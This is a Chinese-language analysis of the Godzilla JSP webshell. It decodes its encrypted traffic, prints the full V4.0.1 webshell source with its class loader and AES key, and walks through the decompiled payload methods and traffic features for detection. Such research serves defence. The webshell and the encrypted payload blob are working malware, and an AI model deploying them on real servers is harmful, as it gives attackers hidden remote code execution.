5p515pwyi9d2gmjbUoDfpC%2BGjZYR9wG2mLxw16wrb92Kabko2711i6xtunA9RNCTCBpabGmdLkbWyg5qRc9cyJ16O5Qx672OCBKXzP%2BFWoIapGIv%2BgbII9qsxSADsLr8BzrsTvmDFIuqjogxhu39eHTC4DLb0oU8pfYNVMIpSs3sG8FrzzD5ssPEKf4YmRsEbHzcN3q%2FvcoGhGlbri6x1LKDdQ1FYrCLdGsqm6dh%2BOmGE0UeaIP75z%2BV3Ws7yU8qlHvi4VLi5Y42kZzcsUtMgsCfQVFSNPEDk7XZAFVmpMvO%2FIf7fdxMVvEm3YZV8oX51%2FOy3uh2OzsvJhFxxr8uImbC184cyd8UBcCtRKyJe85uF0z2Q40v4Fo8jITNxRSfcWY2wlffp76aYcJiBTYCYPPWDqeHX8dOY%2BuodEPxOcCCw77ZFC1bK9Rl%2Br%2FwXfB17HYOoTHFCS0kweh0HFX8978huZE4BpeM6%2FzbG0%2FU45%2BQZ%2Bjdb%2Fc8ZAV0w0%2BbtlxHVC3Tk%2BvjHxlAf6Z9vuIdF3I02IVhT%2BAvJtF1Gqk6jl99GpA%2BtGJ80TvnoJTLdTCePg9uoLZptGUBZS2opm5hVfMPAQT3%2F0oR7nE7Flk%2FFVWoE%2BdpP4kteWJKc3jdgCIlzYL%2Bpiv2IfiRB21dtX9dfl13jiUyeC45jvuA9fhhFp2ujdzMDNiH%2FchefpURi6pgPXm%2BQiUDA6yEBFw0jciJDD5D9TrcRHxwoCLviK%2FzoiaC1sBu%2Bi0rjCsmxZCF2fp9h2YsATw0Pez4%2FYJihpNfiEtFe4ziObT%2FLX6tAoKQszRF6myw9%2FXkBqxr%2B6tQawIDQmPFy3bHR6KLqCj%2B790FykqAmqBNfdGSbha3%2FLUH2IUqNv80fWLHOez1Qa%2BLaAwKzkaaTBiQDJ%2Bg4evIE3r1YRjzUtnq9hYFP5JRpuXUG6LIEN29xPNj8wZcC0Wz3oy5kgmwiQqbTpwIw1UgzeXSB5xzy2iFCzLBbuI5ru1HnzebBRVWA4HJfbZy1d172bbP0EhGu%2FihjMDHlMT2oIbxTJt4XRKhoG6Jy9vg0v6pEyn3enzh4IL5HX7S5NXKrb%2Bb5EiUNhygX4gI2N5uP8CCm%2BpO4XCPKo4Dic6xDYbZrOLE5Z9I01mplnMH8LRjQHa03mIrJldDQL23M3%2F9hxo%2FTziPbBTSB12RUMYTJZ0WjlYPvzNWVp7VMwXtDvxHgmxHrN%2FxceqeU6Mrg%2BZftYoqTpn93QJgWiB4z6iosXqOU7gWqlgsjgwqNYOVzIGmEubkBuj7yJ%2Fq%2Bva%2FZxFK2MuM9FFoPu3m3ef9kd4q8F8bNUpdvM%2BGFYljNMDojPsbiioam5H5f6oB2vdCtO7WgqH5h3FRIgNsM9JQ2Ot0a3cCdCK8CMXtcAGwSNNwvcI0gygWRO%2FcU7wC%2B0YTamsoeSBocM14jfFENJksZqeV7wMkFBWNlWLCFJmXG0jGfLGEVWsqWLvFZ5RqIXD%2BZHEMelNK4DUGyomXOJAlfVOQpRewAiecH1QTYtWKxqSTHZcFxGolYW2T1W4jA9G3IKG%2BeXKGDKS%2F%2BxhRWV3ucoxf%2BiG%2Fu64OtKjlXgLK5L4%2BAG1nCaMNGvepucS1cm1F16JYFBMJ270ljcZFaA5dNgo60v7eaHnnuqCmNDBMuRMNJEE0qdk95bS0%2Fwrvbj68KkCNBfboriai4Xjgvr1Ux2glAzwbyC88r1QTYtWKxqSTHZcFxGolYW%2BAlvdV1BNgCTMgwtl2MATth%2BSWCF8PO9AuzV0fjO6fYf9LojEVoMNsmJxxbor42suwWyEDx1FmCs0d1yOGRzn%2Fevox1Lri3PMBmroJftmowRgFT0xm4lduuTwwMHSp9aSTtcSLvv6E2CcvNWgTZ0VFDCjr6cIakhEJJ%2B0f58QxxpU9SKVtGedmk%2BsfK2hqKkVaRshnsZL08vzb6Xx1cjcHbxHztOc4QFGJyCsRlqki1dUWqGGXIcg%2FZVDbOLrqlTSTtcSLvv6E2CcvNWgTZ0VIsaTWcLg6hLcItJ9IR9GrppU9SKVtGedmk%2BsfK2hqKkVaRshnsZL08vzb6Xx1cjcHbxHztOc4QFGJyCsRlqki1n5Nh6uE78SAd4Xmmnha44tzNmcQLt%2BkNhfDh8JB1iiag7Fg01zIyq5q1bcBI3uWjOw%2B0eJ4G%2BOvOpyDXjOYmX3yesHP4hV%2Ba4kcLBb6vrc5Dg7xYJDuTqbh8SxAv0fEcVPar%2FqwO8I8Nfm%2FN0f%2Be%2B68v0y5glgkzMwJHJNyQHUuwhjt%2BEWadiqmNbVCfl3vIgUY6M47tQeVXhc5ezUWz88XXWTndq9E4oRUuX5iC3yjzW4d%2FUVJZKll07o%2FWhR9ECON5XT0B8d07cA6ZMJmm23q8%2BUZE%2BW%2BZ14OqtH8bhGnhIpwfzHxBbA%2BDZaro%2Fz2wAVNy6ythO47mM9x%2BoiiBgPCedXu7UReqXzj6WN7107bS3TIk31K5LKsZK6olHqIr5i6dJ%2FFT8gkWzAuv5Rjo2V3VKGwjoUko%2FQC98IleuxGrm0%2FZso7bGz1LNdw%2B62F7evz093UtRWVQvF7%2FZZG%2FRKhQRBkAmzes3yCKw64wEECY%2BbDey9xceWAfR8a4J10a18r80y%2BLqKOurEHw2Ty4QK2DmqJ9sSgegR%2F1RCDMlyq%2FRDYqHOcFWIBkUshaNX%2FsXLWQURBqGc5QDY4Hg7akJTsbf7O8U83Ya0DFgHyCfWjNuvnv7%2FkXN%2BlXmSPb6lH5yEfURrM5q4LulyfnJwyuS7%2FNeFvXU3Isndyy5%2BeCVR2L%2Bowi2pq88%2Fh%2F0nFDCCRQkW%2BDuAGHILyit2YrwL1dcqCGaiCngcMWddTfOi7gVrfVKvyisHYR8gO0x2YNsndY5aEARSLWVVALObIIP%2FErYjWzhY7182G1Xv5baA0uqGhyAmV1q%2FH4i52j8EYTZ56ovZhyc4TQwwoFrlubDa9iAVblryj4Vyepec4xjE94l4Af1s4abwafHC6YTIs6fCg%2Bv4NVeH5ew3YlyptgOy3D4oZfZpbv7S%2FNW4bkyQoILy2odL73cM1jH5%2B%2Bpz%2BDZ3aF0PKGlPhEIZ1BJ10N0kBcbQcXEwzUa105OnyfVtPcaR%2B7mFzR6VUUFFRFVGi5zGzXFmU1FF%2BGFBvVv5y6ei50Fya9FaDQIRizg4EkRf5VzA1GRiBMs6IauxJk3M%2FX31hcLxCYe2Q3DfEd%2Fj8Kf95zVnWjW4eqy%2FK%2F3HV0IqgAjo22abGPhSYOs6j5H33zo%2BZFgpY5rC%2Fykfzt4u6zXIvlfWybESoyliVw9tAUg%2Fj7E6L8eARIhJ7aRIqik73RK3yBhY7tKGGs%2FfvAlABZkf3XDw1eXYYRtPBUg10SU4zOU4i4Ise%2FSm2B6BIDsBKUt3CTe1kU6kUuIqcGJsQXhYQjEFNd3S4A1mJuH8zxUAFrgWBunLsbXxoGRlqyfwqS8353Y7okfRpHc5wqDgYgMcXS4gnLAgbwfeRKCob2aWbXDBRFTElkPzaJgpXUYSPXDLvl%2BxjExYoh4BE3iKrsNqzt7XjiBQAS4Z6%2BXu5pB%2BtudMA5m1rO9RLIIceVoMhuT4jey3oCRmb4jBxL%2Bl0WlE%2FH3djTUuqFgbavyS8jvSm7XelwHVREo6xsivE3ZWb%2FWgfZ06b0bVuoD%2FG%2BsDKdJyppEPE3XNkLOtyRoWtDf7P%2Fk0PlToHZmxvW2p7hshG5K9eLDaLt3uRrE9UDdo9BEFjavzOqN32SZP6C0m7nAM4z8VarBXqBRv8%2F017Rk5D8lHz5cZApy8m4deLkUUx5RSTpEvaJbEyar8LdEja7Zz9Kp6v6upte%2FRYnpAkwsJH3D1UiX9BpIa358SP9BUQ1gEXWmJ4elo7Ip8UKs2yy6zDcUAkGCQ%2F32lyFF3qmxPhjOn0vSsMVBgPXv%2BAnmbobKlvVBR5tNcIfWaK6e4P2rljxWc5xMxWsb6tozklpm5aD8EGciOBR8FM0Sc4%2B8hgl3unIVuXdmJAba37OH%2BDd7BgSHsPqannt3a4BcYxlrC16Q3bgW4Wznw6WuoB2XEfWj8DIGOhEnN6uQFzGcUYUvyeABrFqy1Oxqc8pqIVy2fq7yF%2ByEsODEQ6a3N7IXQR4On5KrXLQw35xB%2BOX74A5V2eIu0uNRcW2v233hgmqwS%2FNOiq9sQ6xOZgzL1ZH4wkn6CQfZ7ocXeiM9Xnfxa3Wa4SHd14I3LbD8DGIQKai%2FynWHO2BHOkt28zVeTfCtu60pSeNvGYdj%2FbVcuZQ7HWRS7zyxrjex7ia2luSXbQAmJLuezHUE6uKj2d5ya9CY6lkvYwGglmpt9jeX7MKv5qF4%2Fcn6QAwc5eGk5uGEP%2FCzhVPmR7RBp3g4H6v2t1TVElGZ9OHrcCrRvx1T1VLmsIEl%2B6V44fHLokD7bFikVpy2XZaVNAZoWca6J7kFhFKDEcqHHVRyIPlknWBNV3zPTQ9EQ5FczTJhmMa6x1u7ZkC34kK0rtu858RGooTFzjFOdBqo6iqf29e4Xn7grLviiECsZKw0DES8saz1VtbHWAALP%2FuQ%2FITec6EsEYTv68lG0OZnz6vhjwC325pXiD0ERpg7Vl5VKYylKTsJmbbGp9o%2FboXosTza1GFnIs3GQn6B8EUDjTcqv%2BkaLsZNvEZ5sYJyN5bf%2FqbR43YqE3T9fz0Tn8NKQGO24Fk50gzPmQ0ZDR2H%2FBO3RJ%2BQbItjMO1lUbiNrB%2FmylQNb1%2Bx0omkr6nVPxGMuXJoxgbdwcTtpVwP1n7hKvSm4HzVeDuvLBsSDt%2BZlwx%2BTyNQDHeikhJZqPUJ3GsprcNQ9mJka5LHS8hU4cAGdPbQAVWX3g5wAnN47F0gMFM8I49bX2ROkqSYco%2B%2BegsmyM%2By2li%2FsqxL%2FgOle66iGtWZ7n%2FWuNlJ9yy7egptgKY%2BRe4DwvWjs%2FI5p5hf5RcxqBGtWsVA%2FEsDWLKEY7pEdB8DNuf9gLkbgjnR8USKKy9oNWiL8PlT0Zf%2BG66KNOCMwe%2BE9mf2hkRGP2mzP1YlLvXOoowGEbauKVghs1GVl375o6FvpCXHezaJvkeVx1TyZ2kxfpoZFq%2FuZrj86UptVKh4WKcCv%2BJ61SPSByooq9g1fiAt3mer%2BPomsKWUL4plwUoB5jBwnkwZOTh5WIlRz6mUpoRE8I%2FCkrIR2zA9nbl4uu6TF0AlWrv0eGDoJHl%2F66pFek9vrVwdSLjViWd265t08vTwQrwA6n9%2BEmD1%2FLGxbwe1%2Bl5Kd%2BpyZ95QBpvQGl4fMO4O%2Bgb2Lv4Ujb4n7juFDrZUZL9AcOjZLRYTJyrtetYJntijlLSIUlZMwxAZnM68jA1dcCnPddRpv17JCVq5Og5DSTxUv8EI3JXkUfhUsXAjzf7J%2B2Rvfg0O%2BUzdnwTM1R8OrhIUU7cgy7GCXOnAo5UAo9rFk2sUEo34mY55tYbJX3TvZdKvoafIIRlvvv%2F3MWnTjwSb3TlaDAFDPmSoGOIsP4vA%2BV1s6%2Bb%2BzvYb6ZfzC8M%2BzHOJwyjcIRAWKdgJ18hk4Jt2QIJHCI7NdTELznda%2FDCEDu16qDV7tvIbM2AZwVDqztFHj7FkEzbQRILuN9P5Nunc45HMAIlaof3CnPdcMoWQxUmcZWN5J7KqatE8nld6ZRkCMBKBUjPldwWR9RD8gGOb27smyJZ8DE72FPC6nUkBRkf0hM4bkvpAXBUsjpyKOWEVciyzJYVsa1%2FIV3qk4oKhwu70uKm6vfNeEAtTiNos6NcFLk8XNxoCVidJN9qoaKC3nrde6H%2BJefd3o43NhJBssgtI9YplBmqh06LbcmkNe9HY4hn%2F0qy7JeUokGLVIyTDPRgEDZImJbOje0G8nq2rKoYbnVECZ8LKRS0%2F4FdqWIJtiCFzumfLjiye2QCsYBlGZdETCSysH1%2FYYCsxtkacdD8%2Bei0p0B9giGGsmp32XpmxG2OOkc5XWX2DftafigobuOgHvqAhzxMe%2FmXs93B0%2FIkz1I%2BIKLVfXYuFCGIbTzDhVYhXwfty4heYU7rQXMT6O8d4lbrTWB4NbNwPA%2Bcp%2BMqcMRs5GUbuqc%2F6lndu3NIPpGmWme%2BJka2OXOuR2tn8oEVvqRuKrVr%2BqZ89z2C7aZEHfVsMf57vysgGhRxC6ELRyGFBQHRF%2FS780jTJRnXlcKjApFeE5JVtDPNI1hfcVkbrbrAz7mrECMNH%2Bwn5CoFM3%2FckVffwmYNNHOkdkMQBfXBfwc71V3mLDYYzvMKPtNKqJ7NZHpMTwBuqWNshb61L0NDKq2XaaTsdO37OcdccMMK00ELgMCV0vUTxW23q3Jwv2QdeKf%2Bg5WyJdHep%2FEbteS3ZhSmLPu5oIWVUPxfyY4xcxL9bL7ZovO1tQBtbDQ5sCDhCZiwYii%2BUCLhuttJIuH0z33JlUA7pJmb8VhFyYHIsSLbM72LtEeVkgRFmz6DJ3OSVXtsJNP0W0uzn6UtNFSsNvkKjGbVfDvnpOipInmz6mVLKrH0LAIIJYQTdB24Bke3iUPsE7ANbE17xF0yVJhFCUNywtqnuqM60DuKYuqDCuPaJTB3yP7eggtW9LCDptnodkw4r3uWA1Sg55SIJ5KkjURIRHzZnginJPElxeRoszL6oZvU1GhY%2BbjrZsndv%2FH%2FrqjWX8GJF55kHf9Ol%2BRMBFiWahWR%2FgKkhNnmvDG6f%2BVjL6yFMbjOLSYx%2FqSOTrfvj4NVPxS28uSAO1RjxNyff9AQmsVPhYvmMhmSYLurHUfPhLvr258qA%2Favh%2B0wuEmjfOBOkWGsVcz0RlSibYo8OnwfN5jn2qi7eVjXMmxLcxmMcWJJtix77NDLSLjRkSw%2B9XX%2BEbSyQb5RyvFhcTF%2FOIRmQF5%2BVTPMHnbdY%2F75y4h6k5qfyfuNuYLUeckTyBOCxmOuYVzlbzLfTKXZT0LcqGqQtbosD7pUEtSrwQNjlo65LKlJxl2v0aqJM%2Bfk0gkMzWJ1MakNB5xIIjrqCa39NNLth1sRejy3JaITlAlu7Gj759SyPKxsWU05P7fAK6%2FC5oyj5cLdAmz8okawIrV%2FME2zX3KQcM7L814sAz2Q3rUs9Ft2jZk9EadY1GKGxepWCYapqepcgi2LcAAcuhNCOlUa1rcAnmyvpNVThQkEAfVmVzUikMfQuBe%2BSW%2BltQUiwxjN4sFlwLynz4nx6W2f9jtRRUxV2KFpkNrlvCNC8z85IrooT4PyzWeJ0ebgdQH6dDJnnxJg8ocGuTayGSRR5khcyncLO8xPmcGkZfSfbkmK0Th0bIp3abGmoeAwNYTNbGuxi11gCDnkETw%2BYX7wFLXLEKCkW3WS1vyYXUsoh4I5x0RiMnmbVrZEx1HZSVdy%2Fb7wzHyqUEHAUFzHPUM%2F7z4CZ%2BUSX8dHwezdlJR1IMWzb2P%2BGaJfwRPUtRekRo7QqsXTMR2sUurVOkwFN9SPKJmGFEMfJWw995fMnNFiFKbiSDG9Wax0wni7UcS2Qw64KkfIovRrvUbJCEioeqElZlnwNP%2Bj4ppcFUMsYNHa4pcgI7SXI6BpWFAyGfvveqJ%2FbYfVw48uzK3FrNAUVs2qwPqxcWWRcmqa%2Bjeo9pu5n7RvChEynlixhFD%2BPOqenIFhw0AWyB6ZYXiX5flN0NZx1zCITaU7UtjnZZrKExnVAnHn1FjVxRU8qitTBtiw3RjHShfG%2B5Pm8mtwDs%2BMmrsiHYN0r71Ijsq5c%2BpC2JDpuMGfW1n2JKgzwiv%2FB9mpkvl3XCfjSE8MEVSA6yD7WYG2rSHfpe5kVRqwQuSlNrVrXEsi9c6jD7J9ek8B33vFw09CS2OvAcdCNojzcMwv5AwaHxnS54QPb5AKgvGP%2FPVxoAN4SZOa487AmcDxhyAEqvdavrp4z%2FiXMBzXosgsAQtTafdz11AFQVs%2BO53M3igZxCxsQYmlB%2B1F4F5BPkxwKHnHlzf3CzZ5oUvhzZZkBsVEm8S0mIvMkXuAsH0kdIXxJ2V36H8ffTD0H5BceBabWb5m8yx4p9Zhh1tWjm8jpxj0oAjeLj9Fvie4PPqxd7Sy%2BHAKaudSz0dBABJ4xk%2BJclINhb8C1qTR17FlkH0TEpUYSvhul%2BC%2BQoeFe6BVfOy5nqFWpWoCNA9DiSzqWkns70RDSNWR4vI3AtXCfs9CsPL05OssVbUIGer0mGyhNcHS13uLRLzI%3DHTTP

将pass后的值赋值给变量pass1,通过base64解密和AES解密后可以看到这确实是Payload类的源码

byte[] data=base64Decode(URLDecoder.decode(pass1, "UTF-8" ));
data=x(data, false);
String filePath="/Users/dxy/Downloads/POC_Test/src/main/java/CCTest/Gozlia.class";
Files.write(Paths.get(filePath), data, StandardOpenOption.CREATE);

第二次请求

pass=YEnj8u4cQ6nrblbzSPp88UgInFefcTYegl319BC2HaU%3D

依旧通过base64和AES解密

String pass2="YEnj8u4cQ6nrblbzSPp88UgInFefcTYegl319BC2HaU%3D";
byte[] data=base64Decode(URLDecoder.decode(pass2, "UTF-8" ));
data=x(data, false);
String parameter=new String(data,"UTF-8");

得到的结果如下

methodName=dGVzdA==

如果对值进行base64解密这个结果其实是:methodName=test

在请求结束后有一行打印

11CD6A8758984163NzaU6N3CjHqGaLefw10LgQ==6C37AC826A2A04BC

根据JSP源码,response打印md5的前16位

String xc="3c6e0b8a9c15224a"; // 密钥默认为"key"
String pass="pass";  //默认密码
String md5=md5(pass+xc); // 11cd6a87589841636c37ac826a2a04bc

所以md5的前16位为11cd6a8758984163,后16位6c37ac826a2a04bc,中间NzaU6N3CjHqGaLefw10LgQ==,base64和AES解密后为ok

第三次请求

pass=BWgWba%2FcB22aiK1VixsNi4QsXeqb7GmuLOhwdts%2FoL0%3D

解密完如下,methodName为getBasicsInfo

methodName=Z2V0QmFzaWNzSW5mbw==

请求结束后的打印,同样是用md5前16位+命令执行结果+md5后16位



此时将命令执行结果bae64和AES解密后字符串就是基础信息页面显示的内容

哥斯拉V4.0.1

根据工具说明可以知道,3.0版本是一个分水岭,3.0以上版本的WebShell管理器无法连接2.92生成的JSP木马。具体看一下生成的JSP木马,这里直接贴的最新的V4.0.1版本生成的jsp

<%! 
String xc="3c6e0b8a9c15224a"; // 密钥默认为"key"
String pass="pass";  //默认密码
String md5=md5(pass+xc); 
class X extends ClassLoader{ // 类加载器
    public X(ClassLoader z){super(z);}
    public Class Q(byte[] cb){return super.defineClass(cb, 0, cb.length);} }
    public byte[] x(byte[] s,boolean m){  //字节码进行AES加密
        try{
            /*
            Cipher密码相关类,支持的常见算法包括AES、RSA、SHA-256等
            参数m:true加密,false解密
            */
            javax.crypto.Cipher c=javax.crypto.Cipher.getInstance("AES");
            c.init(m?1:2,new javax.crypto.spec.SecretKeySpec(xc.getBytes(),"AES"));
            return c.doFinal(s); 
        }
        catch (Exception e){return null; }
    }
    /*
    MessageDigest:提供信息摘要算法如 MD5 或 SHA 算法
    getInstance()方法获取对象,参数md5为选取的算法种类
    */
    public static String md5(String s) {
        String ret = null;
        try {
            java.security.MessageDigest m;m = java.security.MessageDigest.getInstance("MD5");
            m.update(s.getBytes(), 0, s.length());
            ret = new java.math.BigInteger(1, m.digest()).toString(16).toUpperCase();
        }catch (Exception e) {}
        return ret; 
    }
    public static String base64Encode(byte[] bs) throws Exception {
        Class base64;String value = null;
        try {
            base64=Class.forName("java.util.Base64");
            Object Encoder = base64.getMethod("getEncoder", null).invoke(base64, null);
            value = (String)Encoder.getClass().getMethod("encodeToString", new Class[] { byte[].class }).invoke(Encoder, new Object[] { bs });
        } catch (Exception e) {
            try {
                base64=Class.forName("sun.misc.BASE64Encoder"); 
                Object Encoder = base64.newInstance(); 
                value = (String)Encoder.getClass().getMethod("encode", new Class[] { byte[].class }).invoke(Encoder, new Object[] { bs });
            } 
            catch (Exception e2) {}
        }
        return value; 
    }
    public static byte[] base64Decode(String bs) throws Exception {
        Class base64;
        byte[] value = null;
        try {
            base64=Class.forName("java.util.Base64");
            Object decoder = base64.getMethod("getDecoder", null).invoke(base64, null);
            value = (byte[])decoder.getClass().getMethod("decode", new Class[] { String.class }).invoke(decoder, new Object[] { bs });
        } catch (Exception e) {
            try { 
                base64=Class.forName("sun.misc.BASE64Decoder");
                Object decoder = base64.newInstance();
                value = (byte[])decoder.getClass().getMethod("decodeBuffer", new Class[] { String.class }).invoke(decoder, new Object[] { bs });
            }catch (Exception e2) {}
        }
        return value; 
    }
%>
<%
    try{
        byte[] data=base64Decode(request.getParameter(pass)); // 字节码base64解密
        data=x(data, false); //字节码AES解密
        if (session.getAttribute("payload")==null){
            // 将加载到的Class放到payload
            session.setAttribute("payload",new X(this.getClass().getClassLoader()).Q(data));
        } else{
            request.setAttribute("parameters",data); // 类字节码放到parameters
            java.io.ByteArrayOutputStream arrOut=new java.io.ByteArrayOutputStream();
            Object f=((Class)session.getAttribute("payload")).newInstance(); // 类实例化
            f.equals(arrOut);
            f.equals(pageContext);
            response.getWriter().write(md5.substring(0,16));
            f.toString();
            response.getWriter().write(base64Encode(x(arrOut.toByteArray(), true))); //AES加密、Base64加密
            response.getWriter().write(md5.substring(16));
          } 
    }catch (Exception e){}
 %>

区别在于jsp下半部分

// V2.92
f.equals(pageContext);
response.getWriter().write(md5.substring(0,16));
response.getWriter().write(base64Encode(x(base64Decode(f.toString()), true)));
response.getWriter().write(md5.substring(16));} 

// V4.0.1
f.equals(arrOut);
f.equals(pageContext);
response.getWriter().write(md5.substring(0,16));
f.toString();
response.getWriter().write(base64Encode(x(arrOut.toByteArray(), true))); //AES加密、Base64加密
response.getWriter().write(md5.substring(16));

很明显,equals和toString的功能改变了。具体看一下代码。

(1)equals

equals依旧调用了noLog,但是equals不再判断传入的对象是否为PageContext,而是调用handle方法

  public boolean equals(Object obj) {
    if (obj != null && handle(obj)) {
      noLog(this.servletContext);
      return true;
    } 
    return false;
  }
handle

具体看一下handle,判断传入的对象的类型。

  public boolean handle(Object obj) {
    if (obj == null)
      return false; 
    if (class$1 == null)
      try {
      
      } catch (ClassNotFoundException classNotFoundException) {
        throw new NoClassDefFoundError(null.getMessage());
      }  
    if ((class$1 = Class.forName("java.io.ByteArrayOutputStream")).isAssignableFrom(obj.getClass())) {
      this.outputStream = (ByteArrayOutputStream)obj;
      return false;
    } 
    if (supportClass(obj, "%s.servlet.http.HttpServletRequest")) {
      this.servletRequest = obj;
    } else if (supportClass(obj, "%s.servlet.ServletRequest")) {
      this.servletRequest = obj;
    } else {
      if (class$0 == null)
        try {
        
        } catch (ClassNotFoundException classNotFoundException) {
          throw new NoClassDefFoundError(null.getMessage());
        }  
      if ((class$0 = Class.forName("[B")).isAssignableFrom(obj.getClass())) {
        this.requestData = (byte[])obj;
      } else if (supportClass(obj, "%s.servlet.http.HttpSession")) {
        this.httpSession = obj;
      } 
    } 
    handlePayloadContext(obj);
    if (this.servletRequest != null && this.requestData == null) {
      if (class$2 == null)
        try {
        
        } catch (ClassNotFoundException classNotFoundException) {
          throw new NoClassDefFoundError(null.getMessage());
        }  
      false[class$2] = class$2 = Class.forName("java.lang.String");
      Object retVObject = this.servletRequest.getMethodAndInvoke("getAttribute", (String)new Class[1], new Class[1], 
          new Object[] { "parameters" });
      if (retVObject != null) {
        if (class$0 == null)
          try {
          
          } catch (ClassNotFoundException classNotFoundException) {
            throw new NoClassDefFoundError(null.getMessage());
          }  
        if ((class$0 = Class.forName("[B")).isAssignableFrom(retVObject.getClass()))
          this.requestData = (byte[])retVObject; 
      } 
    } 
    return true;
  }

有如下几种类型,如果对象是一类型的,就赋值给对应的变量。

ByteArrayOutputStream -> this.outputStream
HttpServletRequest | ServletRequest -> this.servletRequest
[B (byte[].class) -> this.requestData
HttpSession -> this.httpSession
supportClass

根据handle方法的实现,传入classNameString的参数一般为%s.servlet.http.HttpServletRequest%s.servlet.ServletRequest%s.servlet.http.HttpSession,根据String.format可知%s代表javaxjakartagetClass方法的实现就是Class.forName(name);

class1.isAssignableFrom(class2)则是用于判断class2是不是class1的子类或者子接口。也就是判断传入的这个Obj对象是否为HttpServletRequest、ServletRequest、HttpSession这三个支持的类型中的一个,是就返回true,否则false。

  private boolean supportClass(Object obj, String classNameString) {
    if (obj == null)
      return false; 
    boolean ret = false;
    Class c = null;
    try {
      if ((c = getClass(String.format(classNameString, new Object[] { "javax" }))) != null)
        ret = c.isAssignableFrom(obj.getClass()); 
      if (!ret && (c = getClass(String.format(classNameString, new Object[] { "jakarta" }))) != null)
        ret = c.isAssignableFrom(obj.getClass()); 
    } catch (Exception exception) {}
    return ret;
  }
handlePayloadContext

通过传入对象获取Request、ServletContext、Session对象,分别对应的存储对象是servletRequestservletContexthttpSession

  private void handlePayloadContext(Object obj) {
    try {
      Method getRequestMethod = getMethodByClass(obj.getClass(), "getRequest", null);
      Method getServletContextMethod = getMethodByClass(obj.getClass(), "getServletContext", null);
      Method getSessionMethod = getMethodByClass(obj.getClass(), "getSession", null);
      if (getRequestMethod != null && this.servletRequest == null)
        this.servletRequest = getRequestMethod.invoke(obj, null); 
      if (getServletContextMethod != null && this.servletContext == null)
        this.servletContext = getServletContextMethod.invoke(obj, null); 
      if (getSessionMethod != null && this.httpSession == null)
        this.httpSession = getSessionMethod.invoke(obj, null); 
    } catch (Exception exception) {}
  }

(2)toString

V2.92版本中,toString主要是用来调用run方法,然后清空request的parameters属性。V4.0.1版本中同样调用了run,但是前提是当parameterMap中有evalNextData属性时

public String toString() {
    String returnString = null;
    if (this.outputStream != null) {
      try {
        initSessionMap();
        GZIPOutputStream gzipOutputStream = new GZIPOutputStream(this.outputStream);
        formatParameter();
        if (this.parameterMap.get("evalNextData") != null) {
          run();
          this.requestData = (byte[])this.parameterMap.get("evalNextData");
          formatParameter();
        } 
        gzipOutputStream.write(run());
        gzipOutputStream.close();
        this.outputStream.close();
      } catch (Throwable e) {
        returnString = e.getMessage();
      } 
    } else {
      returnString = "outputStream is null";
    } 
    this.httpSession = null;
    this.outputStream = null;
    this.parameterMap = null;
    this.requestData = null;
    this.servletContext = null;
    this.servletRequest = null;
    this.sessionMap = null;
    return returnString;
  }

initSessionMap()的逻辑比较简单,如果session中存在sessionMap属性,就将它的值赋值给this.sessionMap,否则就创建一个sessionMap属性

formatParameter

将类中的变量this.XXX都存放在parameterMap中,GZIPOutputStream用于GZIP压缩,GZIPInputStream则是解压缩。可以看到在4.X版本开始采取了数据压缩的方式,从this.requestData中解压缩数据,读取数据中的内容,也放入parameterMap中。

public void formatParameter() {
    this.parameterMap.clear();
    this.parameterMap.put("sessionMap", this.sessionMap);
    this.parameterMap.put("servletRequest", this.servletRequest);
    this.parameterMap.put("servletContext", this.servletContext);
    this.parameterMap.put("httpSession", this.httpSession);
    byte[] parameterByte = this.requestData;
    ByteArrayInputStream tStream = new ByteArrayInputStream(parameterByte);
    ByteArrayOutputStream tp = new ByteArrayOutputStream();
    String key = null;
    byte[] lenB = new byte[4];
    byte[] data = null;
    try {
      GZIPInputStream inputStream = new GZIPInputStream(tStream);
      while (true) {
        byte t = (byte)inputStream.read();
        if (t == -1)
          break; 
        if (t == 2) { // 判断是否为等于号
          key = new String(tp.toByteArray());
          inputStream.read(lenB);
          int len = bytesToInt(lenB);
          data = new byte[len];
          int readOneLen = 0;
          do {
          
          } while ((readOneLen += inputStream.read(data, readOneLen, data.length - readOneLen)) < data.length);
          this.parameterMap.put(key, data);
          tp.reset();
          continue;
        } 
        tp.write(t);
      } 
      tp.close();
      tStream.close();
      inputStream.close();
    } catch (Exception exception) {}
  }

第一个t为109,tp.write(t)得到m。第二t为101,tp.write(t)得到的是me,以此类推。t==2的时候,即当前字符为等于号,会把当前tp中所有内容转换成字符串赋值给key,默认情况下为methodName。在do-while循环中将后续字符赋值给data。

run

和2.92版本类似,如果在没有传入类名就是从Payload类中调用对应的方法

public byte[] run() {
    try {
      String className = get("evalClassName");
      String methodName = get("methodName");
      if (methodName != null) {
        if (className == null) {
          Method method = getClass().getMethod(methodName, null);
          if (class$0 == null)
            try {
            
            } catch (ClassNotFoundException classNotFoundException) {
              throw new NoClassDefFoundError(null.getMessage());
            }  
          if (class$0.isAssignableFrom(class$0 = Class.forName("[B")))
            return (byte[])method.invoke(this, null); 
          return "this method returnType not is byte[]".getBytes();
        } 
        Class evalClass = (Class)this.sessionMap.get(className);
        if (evalClass != null) {
          Object object = evalClass.newInstance();
          object.equals(this.parameterMap);
          object.toString();
          Object resultObject = this.parameterMap.get("result");
          if (resultObject != null) {
            if (class$0 == null)
              try {
              
              } catch (ClassNotFoundException classNotFoundException) {
                throw new NoClassDefFoundError(null.getMessage());
              }  
            if ((class$0 = Class.forName("[B")).isAssignableFrom(resultObject.getClass()))
              return (byte[])resultObject; 
            return "return typeErr".getBytes();
          } 
          return new byte[0];
        } 
        return "evalClass is null".getBytes();
      } 
      return "method is null".getBytes();
    } catch (Throwable e) {
      ByteArrayOutputStream stream = new ByteArrayOutputStream();
      PrintStream printStream = new PrintStream(stream);
      e.printStackTrace(printStream);
      printStream.flush();
      printStream.close();
      return stream.toByteArray();
    } 
  }

V4.0.1 流量特征

第一次请求

请求头部,User-Agent变了,不再是Java/version,而是User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:84.0) Gecko/20100101 Firefox/84.0

POST /MemShellShowTest_war_exploded/gslfor.jsp HTTP/1.1
User-Agent: Java/1.8.0_241
Host: localhost:8080
Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
Connection: keep-alive
Content-type: application/x-www-form-urlencoded
Content-Length: 33035

请求Body依旧是pass=xxx,pass后的数据可以通过Base64、AES解密得到类的源码如下,里面依旧是Payload.class中的内容

public class SettableBeanProperty extends ClassLoader {
  ...
}

第二次请求

POST body中的内容,同样进行base64和AES解密后发现还不是明文,这就看到上述formatParameter方法的区别,进行了数据的解压缩。

